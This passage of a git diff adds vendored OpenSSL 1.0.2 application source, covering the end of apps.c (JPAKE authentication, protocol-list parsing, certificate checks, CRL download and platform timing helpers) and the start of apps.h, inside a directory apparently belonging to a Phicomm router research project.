+        ERR_print_errors(bio_err);
+        exit(1);
+    }
+    JPAKE_STEP3A_release(&s3a);
+}
+
+static void jpake_receive_step3b(JPAKE_CTX *ctx, BIO *bconn)
+{
+    JPAKE_STEP3B s3b;
+    int l;
+
+    JPAKE_STEP3B_init(&s3b);
+    l = BIO_read(bconn, s3b.hk, sizeof s3b.hk);
+    assert(l == sizeof s3b.hk);
+    if (!JPAKE_STEP3B_process(ctx, &s3b)) {
+        ERR_print_errors(bio_err);
+        exit(1);
+    }
+    JPAKE_STEP3B_release(&s3b);
+}
+
+void jpake_client_auth(BIO *out, BIO *conn, const char *secret)
+{
+    JPAKE_CTX *ctx;
+    BIO *bconn;
+
+    BIO_puts(out, "Authenticating with JPAKE\n");
+
+    ctx = jpake_init("client", "server", secret);
+
+    bconn = BIO_new(BIO_f_buffer());
+    BIO_push(bconn, conn);
+
+    jpake_send_step1(bconn, ctx);
+    jpake_receive_step1(ctx, bconn);
+    jpake_send_step2(bconn, ctx);
+    jpake_receive_step2(ctx, bconn);
+    jpake_send_step3a(bconn, ctx);
+    jpake_receive_step3b(ctx, bconn);
+
+    BIO_puts(out, "JPAKE authentication succeeded, setting PSK\n");
+
+    if (psk_key)
+        OPENSSL_free(psk_key);
+
+    psk_key = BN_bn2hex(JPAKE_get_shared_key(ctx));
+
+    BIO_pop(bconn);
+    BIO_free(bconn);
+
+    JPAKE_CTX_free(ctx);
+}
+
+void jpake_server_auth(BIO *out, BIO *conn, const char *secret)
+{
+    JPAKE_CTX *ctx;
+    BIO *bconn;
+
+    BIO_puts(out, "Authenticating with JPAKE\n");
+
+    ctx = jpake_init("server", "client", secret);
+
+    bconn = BIO_new(BIO_f_buffer());
+    BIO_push(bconn, conn);
+
+    jpake_receive_step1(ctx, bconn);
+    jpake_send_step1(bconn, ctx);
+    jpake_receive_step2(ctx, bconn);
+    jpake_send_step2(bconn, ctx);
+    jpake_receive_step3a(ctx, bconn);
+    jpake_send_step3b(bconn, ctx);
+
+    BIO_puts(out, "JPAKE authentication succeeded, setting PSK\n");
+
+    if (psk_key)
+        OPENSSL_free(psk_key);
+
+    psk_key = BN_bn2hex(JPAKE_get_shared_key(ctx));
+
+    BIO_pop(bconn);
+    BIO_free(bconn);
+
+    JPAKE_CTX_free(ctx);
+}
+
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+/*-
+ * next_protos_parse parses a comma separated list of strings into a string
+ * in a format suitable for passing to SSL_CTX_set_next_protos_advertised.
+ *   outlen: (output) set to the length of the resulting buffer on success.
+ *   err: (maybe NULL) on failure, an error message line is written to this BIO.
+ *   in: a NUL termianted string like "abc,def,ghi"
+ *
+ *   returns: a malloced buffer or NULL on failure.
+ */
+unsigned char *next_protos_parse(unsigned short *outlen, const char *in)
+{
+    size_t len;
+    unsigned char *out;
+    size_t i, start = 0;
+
+    len = strlen(in);
+    if (len >= 65535)
+        return NULL;
+
+    out = OPENSSL_malloc(strlen(in) + 1);
+    if (!out)
+        return NULL;
+
+    for (i = 0; i <= len; ++i) {
+        if (i == len || in[i] == ',') {
+            if (i - start > 255) {
+                OPENSSL_free(out);
+                return NULL;
+            }
+            out[start] = i - start;
+            start = i + 1;
+        } else
+            out[i + 1] = in[i];
+    }
+
+    *outlen = len + 1;
+    return out;
+}
+#endif                          /* ndef OPENSSL_NO_TLSEXT */
+
+void print_cert_checks(BIO *bio, X509 *x,
+                       const char *checkhost,
+                       const char *checkemail, const char *checkip)
+{
+    if (x == NULL)
+        return;
+    if (checkhost) {
+        BIO_printf(bio, "Hostname %s does%s match certificate\n",
+                   checkhost, X509_check_host(x, checkhost, 0, 0, NULL)
+                   ? "" : " NOT");
+    }
+
+    if (checkemail) {
+        BIO_printf(bio, "Email %s does%s match certificate\n",
+                   checkemail, X509_check_email(x, checkemail, 0,
+                                                0) ? "" : " NOT");
+    }
+
+    if (checkip) {
+        BIO_printf(bio, "IP %s does%s match certificate\n",
+                   checkip, X509_check_ip_asc(x, checkip, 0) ? "" : " NOT");
+    }
+}
+
+/* Get first http URL from a DIST_POINT structure */
+
+static const char *get_dp_url(DIST_POINT *dp)
+{
+    GENERAL_NAMES *gens;
+    GENERAL_NAME *gen;
+    int i, gtype;
+    ASN1_STRING *uri;
+    if (!dp->distpoint || dp->distpoint->type != 0)
+        return NULL;
+    gens = dp->distpoint->name.fullname;
+    for (i = 0; i < sk_GENERAL_NAME_num(gens); i++) {
+        gen = sk_GENERAL_NAME_value(gens, i);
+        uri = GENERAL_NAME_get0_value(gen, &gtype);
+        if (gtype == GEN_URI && ASN1_STRING_length(uri) > 6) {
+            char *uptr = (char *)ASN1_STRING_data(uri);
+            if (!strncmp(uptr, "http://", 7))
+                return uptr;
+        }
+    }
+    return NULL;
+}
+
+/*
+ * Look through a CRLDP structure and attempt to find an http URL to
+ * downloads a CRL from.
+ */
+
+static X509_CRL *load_crl_crldp(STACK_OF(DIST_POINT) *crldp)
+{
+    int i;
+    const char *urlptr = NULL;
+    for (i = 0; i < sk_DIST_POINT_num(crldp); i++) {
+        DIST_POINT *dp = sk_DIST_POINT_value(crldp, i);
+        urlptr = get_dp_url(dp);
+        if (urlptr)
+            return load_crl(urlptr, FORMAT_HTTP);
+    }
+    return NULL;
+}
+
+/*
+ * Example of downloading CRLs from CRLDP: not usable for real world as it
+ * always downloads, doesn't support non-blocking I/O and doesn't cache
+ * anything.
+ */
+
+static STACK_OF(X509_CRL) *crls_http_cb(X509_STORE_CTX *ctx, X509_NAME *nm)
+{
+    X509 *x;
+    STACK_OF(X509_CRL) *crls = NULL;
+    X509_CRL *crl;
+    STACK_OF(DIST_POINT) *crldp;
+    x = X509_STORE_CTX_get_current_cert(ctx);
+    crldp = X509_get_ext_d2i(x, NID_crl_distribution_points, NULL, NULL);
+    crl = load_crl_crldp(crldp);
+    sk_DIST_POINT_pop_free(crldp, DIST_POINT_free);
+    if (!crl)
+        return NULL;
+    crls = sk_X509_CRL_new_null();
+    sk_X509_CRL_push(crls, crl);
+    /* Try to download delta CRL */
+    crldp = X509_get_ext_d2i(x, NID_freshest_crl, NULL, NULL);
+    crl = load_crl_crldp(crldp);
+    sk_DIST_POINT_pop_free(crldp, DIST_POINT_free);
+    if (crl)
+        sk_X509_CRL_push(crls, crl);
+    return crls;
+}
+
+void store_setup_crl_download(X509_STORE *st)
+{
+    X509_STORE_set_lookup_crls_cb(st, crls_http_cb);
+}
+
+/*
+ * Platform-specific sections
+ */
+#if defined(_WIN32)
+# ifdef fileno
+#  undef fileno
+#  define fileno(a) (int)_fileno(a)
+# endif
+
+# include <windows.h>
+# include <tchar.h>
+
+static int WIN32_rename(const char *from, const char *to)
+{
+    TCHAR *tfrom = NULL, *tto;
+    DWORD err;
+    int ret = 0;
+
+    if (sizeof(TCHAR) == 1) {
+        tfrom = (TCHAR *)from;
+        tto = (TCHAR *)to;
+    } else {                    /* UNICODE path */
+
+        size_t i, flen = strlen(from) + 1, tlen = strlen(to) + 1;
+        tfrom = (TCHAR *)malloc(sizeof(TCHAR) * (flen + tlen));
+        if (tfrom == NULL)
+            goto err;
+        tto = tfrom + flen;
+# if !defined(_WIN32_WCE) || _WIN32_WCE>=101
+        if (!MultiByteToWideChar(CP_ACP, 0, from, flen, (WCHAR *)tfrom, flen))
+# endif
+            for (i = 0; i < flen; i++)
+                tfrom[i] = (TCHAR)from[i];
+# if !defined(_WIN32_WCE) || _WIN32_WCE>=101
+        if (!MultiByteToWideChar(CP_ACP, 0, to, tlen, (WCHAR *)tto, tlen))
+# endif
+            for (i = 0; i < tlen; i++)
+                tto[i] = (TCHAR)to[i];
+    }
+
+    if (MoveFile(tfrom, tto))
+        goto ok;
+    err = GetLastError();
+    if (err == ERROR_ALREADY_EXISTS || err == ERROR_FILE_EXISTS) {
+        if (DeleteFile(tto) && MoveFile(tfrom, tto))
+            goto ok;
+        err = GetLastError();
+    }
+    if (err == ERROR_FILE_NOT_FOUND || err == ERROR_PATH_NOT_FOUND)
+        errno = ENOENT;
+    else if (err == ERROR_ACCESS_DENIED)
+        errno = EACCES;
+    else
+        errno = EINVAL;         /* we could map more codes... */
+ err:
+    ret = -1;
+ ok:
+    if (tfrom != NULL && tfrom != (TCHAR *)from)
+        free(tfrom);
+    return ret;
+}
+#endif
+
+/* app_tminterval section */
+#if defined(_WIN32)
+double app_tminterval(int stop, int usertime)
+{
+    FILETIME now;
+    double ret = 0;
+    static ULARGE_INTEGER tmstart;
+    static int warning = 1;
+# ifdef _WIN32_WINNT
+    static HANDLE proc = NULL;
+
+    if (proc == NULL) {
+        if (check_winnt())
+            proc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE,
+                               GetCurrentProcessId());
+        if (proc == NULL)
+            proc = (HANDLE) - 1;
+    }
+
+    if (usertime && proc != (HANDLE) - 1) {
+        FILETIME junk;
+        GetProcessTimes(proc, &junk, &junk, &junk, &now);
+    } else
+# endif
+    {
+        SYSTEMTIME systime;
+
+        if (usertime && warning) {
+            BIO_printf(bio_err, "To get meaningful results, run "
+                       "this program on idle system.\n");
+            warning = 0;
+        }
+        GetSystemTime(&systime);
+        SystemTimeToFileTime(&systime, &now);
+    }
+
+    if (stop == TM_START) {
+        tmstart.u.LowPart = now.dwLowDateTime;
+        tmstart.u.HighPart = now.dwHighDateTime;
+    } else {
+        ULARGE_INTEGER tmstop;
+
+        tmstop.u.LowPart = now.dwLowDateTime;
+        tmstop.u.HighPart = now.dwHighDateTime;
+
+        ret = (__int64)(tmstop.QuadPart - tmstart.QuadPart) * 1e-7;
+    }
+
+    return (ret);
+}
+
+#elif defined(OPENSSL_SYS_NETWARE)
+# include <time.h>
+
+double app_tminterval(int stop, int usertime)
+{
+    double ret = 0;
+    static clock_t tmstart;
+    static int warning = 1;
+
+    if (usertime && warning) {
+        BIO_printf(bio_err, "To get meaningful results, run "
+                   "this program on idle system.\n");
+        warning = 0;
+    }
+
+    if (stop == TM_START)
+        tmstart = clock();
+    else
+        ret = (clock() - tmstart) / (double)CLOCKS_PER_SEC;
+
+    return (ret);
+}
+
+#elif defined(OPENSSL_SYSTEM_VXWORKS)
+# include <time.h>
+
+double app_tminterval(int stop, int usertime)
+{
+    double ret = 0;
+# ifdef CLOCK_REALTIME
+    static struct timespec tmstart;
+    struct timespec now;
+# else
+    static unsigned long tmstart;
+    unsigned long now;
+# endif
+    static int warning = 1;
+
+    if (usertime && warning) {
+        BIO_printf(bio_err, "To get meaningful results, run "
+                   "this program on idle system.\n");
+        warning = 0;
+    }
+# ifdef CLOCK_REALTIME
+    clock_gettime(CLOCK_REALTIME, &now);
+    if (stop == TM_START)
+        tmstart = now;
+    else
+        ret = ((now.tv_sec + now.tv_nsec * 1e-9)
+               - (tmstart.tv_sec + tmstart.tv_nsec * 1e-9));
+# else
+    now = tickGet();
+    if (stop == TM_START)
+        tmstart = now;
+    else
+        ret = (now - tmstart) / (double)sysClkRateGet();
+# endif
+    return (ret);
+}
+
+#elif defined(OPENSSL_SYSTEM_VMS)
+# include <time.h>
+# include <times.h>
+
+double app_tminterval(int stop, int usertime)
+{
+    static clock_t tmstart;
+    double ret = 0;
+    clock_t now;
+# ifdef __TMS
+    struct tms rus;
+
+    now = times(&rus);
+    if (usertime)
+        now = rus.tms_utime;
+# else
+    if (usertime)
+        now = clock();          /* sum of user and kernel times */
+    else {
+        struct timeval tv;
+        gettimeofday(&tv, NULL);
+        now = (clock_t)((unsigned long long)tv.tv_sec * CLK_TCK +
+                        (unsigned long long)tv.tv_usec * (1000000 / CLK_TCK)
+            );
+    }
+# endif
+    if (stop == TM_START)
+        tmstart = now;
+    else
+        ret = (now - tmstart) / (double)(CLK_TCK);
+
+    return (ret);
+}
+
+#elif defined(_SC_CLK_TCK)      /* by means of unistd.h */
+# include <sys/times.h>
+
+double app_tminterval(int stop, int usertime)
+{
+    double ret = 0;
+    struct tms rus;
+    clock_t now = times(&rus);
+    static clock_t tmstart;
+
+    if (usertime)
+        now = rus.tms_utime;
+
+    if (stop == TM_START)
+        tmstart = now;
+    else {
+        long int tck = sysconf(_SC_CLK_TCK);
+        ret = (now - tmstart) / (double)tck;
+    }
+
+    return (ret);
+}
+
+#else
+# include <sys/time.h>
+# include <sys/resource.h>
+
+double app_tminterval(int stop, int usertime)
+{
+    double ret = 0;
+    struct rusage rus;
+    struct timeval now;
+    static struct timeval tmstart;
+
+    if (usertime)
+        getrusage(RUSAGE_SELF, &rus), now = rus.ru_utime;
+    else
+        gettimeofday(&now, NULL);
+
+    if (stop == TM_START)
+        tmstart = now;
+    else
+        ret = ((now.tv_sec + now.tv_usec * 1e-6)
+               - (tmstart.tv_sec + tmstart.tv_usec * 1e-6));
+
+    return ret;
+}
+#endif
+
+/* app_isdir section */
+#ifdef _WIN32
+int app_isdir(const char *name)
+{
+    HANDLE hList;
+    WIN32_FIND_DATA FileData;
+# if defined(UNICODE) || defined(_UNICODE)
+    size_t i, len_0 = strlen(name) + 1;
+
+    if (len_0 > sizeof(FileData.cFileName) / sizeof(FileData.cFileName[0]))
+        return -1;
+
+#  if !defined(_WIN32_WCE) || _WIN32_WCE>=101
+    if (!MultiByteToWideChar
+        (CP_ACP, 0, name, len_0, FileData.cFileName, len_0))
+#  endif
+        for (i = 0; i < len_0; i++)
+            FileData.cFileName[i] = (WCHAR)name[i];
+
+    hList = FindFirstFile(FileData.cFileName, &FileData);
+# else
+    hList = FindFirstFile(name, &FileData);
+# endif
+    if (hList == INVALID_HANDLE_VALUE)
+        return -1;
+    FindClose(hList);
+    return ((FileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) != 0);
+}
+#else
+# include <sys/stat.h>
+# ifndef S_ISDIR
+#  if defined(_S_IFMT) && defined(_S_IFDIR)
+#   define S_ISDIR(a)   (((a) & _S_IFMT) == _S_IFDIR)
+#  else
+#   define S_ISDIR(a)   (((a) & S_IFMT) == S_IFDIR)
+#  endif
+# endif
+
+int app_isdir(const char *name)
+{
+# if defined(S_ISDIR)
+    struct stat st;
+
+    if (stat(name, &st) == 0)
+        return S_ISDIR(st.st_mode);
+    else
+        return -1;
+# else
+    return -1;
+# endif
+}
+#endif
+
+/* raw_read|write section */
+#if defined(_WIN32) && defined(STD_INPUT_HANDLE)
+int raw_read_stdin(void *buf, int siz)
+{
+    DWORD n;
+    if (ReadFile(GetStdHandle(STD_INPUT_HANDLE), buf, siz, &n, NULL))
+        return (n);
+    else
+        return (-1);
+}
+#else
+int raw_read_stdin(void *buf, int siz)
+{
+    return read(fileno(stdin), buf, siz);
+}
+#endif
+
+#if defined(_WIN32) && defined(STD_OUTPUT_HANDLE)
+int raw_write_stdout(const void *buf, int siz)
+{
+    DWORD n;
+    if (WriteFile(GetStdHandle(STD_OUTPUT_HANDLE), buf, siz, &n, NULL))
+        return (n);
+    else
+        return (-1);
+}
+#else
+int raw_write_stdout(const void *buf, int siz)
+{
+    return write(fileno(stdout), buf, siz);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.h
new file mode 100644
index 0000000..8276e70
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/apps.h
@@ -0,0 +1,387 @@
+/* apps/apps.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_APPS_H
+# define HEADER_APPS_H
+
+# include "e_os.h"
+
+# include <openssl/bio.h>
+# include <openssl/x509.h>
+# include <openssl/lhash.h>
+# include <openssl/conf.h>
+# include <openssl/txt_db.h>
+# ifndef OPENSSL_NO_ENGINE
+#  include <openssl/engine.h>
+# endif
+# ifndef OPENSSL_NO_OCSP
+#  include <openssl/ocsp.h>
+# endif
+# include <openssl/ossl_typ.h>
+
+int app_RAND_load_file(const char *file, BIO *bio_e, int dont_warn);
+int app_RAND_write_file(const char *file, BIO *bio_e);
+/*
+ * When `file' is NULL, use defaults. `bio_e' is for error messages.
+ */
+void app_RAND_allow_write_file(void);
+long app_RAND_load_files(char *file); /* `file' is a list of files to read,
+                                       * separated by LIST_SEPARATOR_CHAR
+                                       * (see e_os.h).  The string is
+                                       * destroyed! */
+
+# ifndef MONOLITH
+
+#  define MAIN(a,v)       main(a,v)
+
+#  ifndef NON_MAIN
+CONF *config = NULL;
+BIO *bio_err = NULL;
+#  else
+extern CONF *config;
+extern BIO *bio_err;
+#  endif
+
+# else
+
+#  define MAIN(a,v)       PROG(a,v)
+extern CONF *config;
+extern char *default_config_file;
+extern BIO *bio_err;
+
+# endif
+
+# ifndef OPENSSL_SYS_NETWARE
+#  include <signal.h>
+# endif
+
+# ifdef SIGPIPE
+#  define do_pipe_sig()   signal(SIGPIPE,SIG_IGN)
+# else
+#  define do_pipe_sig()
+# endif
+
+# ifdef OPENSSL_NO_COMP
+#  define zlib_cleanup()
+# else
+#  define zlib_cleanup() COMP_zlib_cleanup()
+# endif
+
+# if defined(MONOLITH) && !defined(OPENSSL_C)
+#  define apps_startup() \
+                do_pipe_sig()
+#  define apps_shutdown()
+# else
+#  ifndef OPENSSL_NO_ENGINE
+#   define apps_startup() \
+                        do { do_pipe_sig(); CRYPTO_malloc_init(); \
+                        ERR_load_crypto_strings(); OpenSSL_add_all_algorithms(); \
+                        ENGINE_load_builtin_engines(); setup_ui_method(); } while(0)
+#   define apps_shutdown() \
+                        do { CONF_modules_unload(1); destroy_ui_method(); \
+                        OBJ_cleanup(); EVP_cleanup(); ENGINE_cleanup(); \
+                        CRYPTO_cleanup_all_ex_data(); ERR_remove_thread_state(NULL); \
+                        RAND_cleanup(); \
+                        ERR_free_strings(); zlib_cleanup();} while(0)
+#  else
+#   define apps_startup() \
+                        do { do_pipe_sig(); CRYPTO_malloc_init(); \
+                        ERR_load_crypto_strings(); OpenSSL_add_all_algorithms(); \
+                        setup_ui_method(); } while(0)
+#   define apps_shutdown() \
+                        do { CONF_modules_unload(1); destroy_ui_method(); \
+                        OBJ_cleanup(); EVP_cleanup(); \
+                        CRYPTO_cleanup_all_ex_data(); ERR_remove_thread_state(NULL); \
+                        RAND_cleanup(); \
+                        ERR_free_strings(); zlib_cleanup(); } while(0)
+#  endif
+# endif
+
+# if defined(OPENSSL_SYSNAME_WIN32) || defined(OPENSSL_SYSNAME_WINCE)
+#  define openssl_fdset(a,b) FD_SET((unsigned int)a, b)
+# else
+#  define openssl_fdset(a,b) FD_SET(a, b)
+# endif
+
+typedef struct args_st {
+    char **data;
+    int count;
+} ARGS;
+
+# define PW_MIN_LENGTH 4
+typedef struct pw_cb_data {
+    const void *password;
+    const char *prompt_info;
+} PW_CB_DATA;
+
+int password_callback(char *buf, int bufsiz, int verify, PW_CB_DATA *cb_data);
+
+int setup_ui_method(void);
+void destroy_ui_method(void);
+
+int should_retry(int i);
+int args_from_file(char *file, int *argc, char **argv[]);
+int str2fmt(char *s);
+void program_name(char *in, char *out, int size);
+int chopup_args(ARGS *arg, char *buf, int *argc, char **argv[]);
+# ifdef HEADER_X509_H
+int dump_cert_text(BIO *out, X509 *x);
+void print_name(BIO *out, const char *title, X509_NAME *nm,
+                unsigned long lflags);
+# endif
+int set_cert_ex(unsigned long *flags, const char *arg);
+int set_name_ex(unsigned long *flags, const char *arg);
+int set_ext_copy(int *copy_type, const char *arg);
+int copy_extensions(X509 *x, X509_REQ *req, int copy_type);
+int app_passwd(BIO *err, char *arg1, char *arg2, char **pass1, char **pass2);
+int add_oid_section(BIO *err, CONF *conf);
+X509 *load_cert(BIO *err, const char *file, int format,
+                const char *pass, ENGINE *e, const char *cert_descrip);
+X509_CRL *load_crl(const char *infile, int format);
+int load_cert_crl_http(const char *url, BIO *err,
+                       X509 **pcert, X509_CRL **pcrl);
+EVP_PKEY *load_key(BIO *err, const char *file, int format, int maybe_stdin,
+                   const char *pass, ENGINE *e, const char *key_descrip);
+EVP_PKEY *load_pubkey(BIO *err, const char *file, int format, int maybe_stdin,
+                      const char *pass, ENGINE *e, const char *key_descrip);
+STACK_OF(X509) *load_certs(BIO *err, const char *file, int format,
+                           const char *pass, ENGINE *e,
+                           const char *cert_descrip);
+STACK_OF(X509_CRL) *load_crls(BIO *err, const char *file, int format,
+                              const char *pass, ENGINE *e,
+                              const char *cert_descrip);
+X509_STORE *setup_verify(BIO *bp, char *CAfile, char *CApath);
+# ifndef OPENSSL_NO_ENGINE
+ENGINE *setup_engine(BIO *err, const char *engine, int debug);
+# endif
+
+# ifndef OPENSSL_NO_OCSP
+OCSP_RESPONSE *process_responder(BIO *err, OCSP_REQUEST *req,
+                                 const char *host, const char *path,
+                                 const char *port, int use_ssl,
+                                 const STACK_OF(CONF_VALUE) *headers,
+                                 int req_timeout);
+# endif
+
+int load_config(BIO *err, CONF *cnf);
+char *make_config_name(void);
+
+/* Functions defined in ca.c and also used in ocsp.c */
+int unpack_revinfo(ASN1_TIME **prevtm, int *preason, ASN1_OBJECT **phold,
+                   ASN1_GENERALIZEDTIME **pinvtm, const char *str);
+
+# define DB_type         0
+# define DB_exp_date     1
+# define DB_rev_date     2
+# define DB_serial       3      /* index - unique */
+# define DB_file         4
+# define DB_name         5      /* index - unique when active and not
+                                 * disabled */
+# define DB_NUMBER       6
+
+# define DB_TYPE_REV     'R'
+# define DB_TYPE_EXP     'E'
+# define DB_TYPE_VAL     'V'
+
+typedef struct db_attr_st {
+    int unique_subject;
+} DB_ATTR;
+typedef struct ca_db_st {
+    DB_ATTR attributes;
+    TXT_DB *db;
+} CA_DB;
+
+BIGNUM *load_serial(char *serialfile, int create, ASN1_INTEGER **retai);
+int save_serial(char *serialfile, char *suffix, BIGNUM *serial,
+                ASN1_INTEGER **retai);
+int rotate_serial(char *serialfile, char *new_suffix, char *old_suffix);
+int rand_serial(BIGNUM *b, ASN1_INTEGER *ai);
+CA_DB *load_index(char *dbfile, DB_ATTR *dbattr);
+int index_index(CA_DB *db);
+int save_index(const char *dbfile, const char *suffix, CA_DB *db);
+int rotate_index(const char *dbfile, const char *new_suffix,
+                 const char *old_suffix);
+void free_index(CA_DB *db);
+# define index_name_cmp_noconst(a, b) \
+        index_name_cmp((const OPENSSL_CSTRING *)CHECKED_PTR_OF(OPENSSL_STRING, a), \
+        (const OPENSSL_CSTRING *)CHECKED_PTR_OF(OPENSSL_STRING, b))
+int index_name_cmp(const OPENSSL_CSTRING *a, const OPENSSL_CSTRING *b);
+int parse_yesno(const char *str, int def);
+
+X509_NAME *parse_name(char *str, long chtype, int multirdn);
+int args_verify(char ***pargs, int *pargc,
+                int *badarg, BIO *err, X509_VERIFY_PARAM **pm);
+void policies_print(BIO *out, X509_STORE_CTX *ctx);
+int bio_to_mem(unsigned char **out, int maxlen, BIO *in);
+int pkey_ctrl_string(EVP_PKEY_CTX *ctx, char *value);
+int init_gen_str(BIO *err, EVP_PKEY_CTX **pctx,
+                 const char *algname, ENGINE *e, int do_param);
+int do_X509_sign(BIO *err, X509 *x, EVP_PKEY *pkey, const EVP_MD *md,
+                 STACK_OF(OPENSSL_STRING) *sigopts);
+int do_X509_REQ_sign(BIO *err, X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md,
+                     STACK_OF(OPENSSL_STRING) *sigopts);
+int do_X509_CRL_sign(BIO *err, X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md,
+                     STACK_OF(OPENSSL_STRING) *sigopts);
+# ifndef OPENSSL_NO_PSK
+extern char *psk_key;
+# endif
+# ifndef OPENSSL_NO_JPAKE
+void jpake_client_auth(BIO *out, BIO *conn, const char *secret);
+void jpake_server_auth(BIO *out, BIO *conn, const char *secret);
+# endif
+
+# ifndef OPENSSL_NO_TLSEXT
+unsigned char *next_protos_parse(unsigned short *outlen, const char *in);
+# endif                         /* ndef OPENSSL_NO_TLSEXT */
+
+void print_cert_checks(BIO *bio, X509 *x,
+                       const char *checkhost,
+                       const char *checkemail, const char *checkip);
+
+void store_setup_crl_download(X509_STORE *st);
+
+# define FORMAT_UNDEF    0
+# define FORMAT_ASN1     1
+# define FORMAT_TEXT     2
+# define FORMAT_PEM      3
+# define FORMAT_NETSCAPE 4
+# define FORMAT_PKCS12   5
+# define FORMAT_SMIME    6
+# define FORMAT_ENGINE   7
+# define FORMAT_IISSGC   8      /* XXX this stupid macro helps us to avoid
+                                 * adding yet another param to load_*key() */
+# define FORMAT_PEMRSA   9      /* PEM RSAPubicKey format */
+# define FORMAT_ASN1RSA  10     /* DER RSAPubicKey format */
+# define FORMAT_MSBLOB   11     /* MS Key blob format */
